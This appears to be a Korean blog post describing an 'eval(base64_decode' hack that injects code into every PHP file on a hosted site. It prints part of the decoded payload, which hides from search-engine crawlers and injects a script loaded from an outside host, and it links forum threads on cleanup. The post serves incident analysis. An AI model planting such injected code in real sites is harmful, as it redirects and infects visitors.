일반 eval(base64_decode 해킹

1. 동일한 피해를 입은 사용자의 사례 (출처 :: sitelink1)

호스팅 해서 쓰고 있는 계정의 모든 PHP 파일의 첫줄에

<?php /**/ eval(base64_decode(“….”); ?>

이 삽입되는 해킹을 당했다. 유사한 사례를 찾아보니 인터넷에 좀 있기는 하다.

PHP 스크립트를 사용하는 동작을 하면 갑자기 이상한 URL 로 자동 리다이렉트 되는 문제가 생긴다.

첫줄에 있는 base64_decode 안에 있는 코드가 실행이 되면서 엉뚱한 곳의 코드를 실행하는 것이다.

decode 를 해보니 볼드체로 된 URL 에 있는 스크립트를 실행한다.

 

if(function_exists(‘ob_start’)&&!isset($GLOBALS[‘mr_no’])){   

    $GLOBALS[‘mr_no’]=1;   

    if(!function_exists(‘mrobh’)){      

        if(!function_exists(‘gml’)){     

            function gml(){      

                if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){       

                    return “<script src=’http://zettapetta.com/js.php’></script”;      

                }      

                return "";     

            }    

        }  

<후략>

 

 

2. 참고 URL 모음

https://forums.oscommerce.com/topic/345957-evalbase64_decode-hack/

https://stackoverflow.com/questions/3462473/php-evalgzinflatebase64-decode-hack-how-to-prevent-it-from-occurring-a

https://forums.oscommerce.com/topic/340995-security-issue-with-admin-directory/

https://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/

https://forums.oscommerce.com/topic/344272-did-someone-hack-my-site-eval-base64-decode/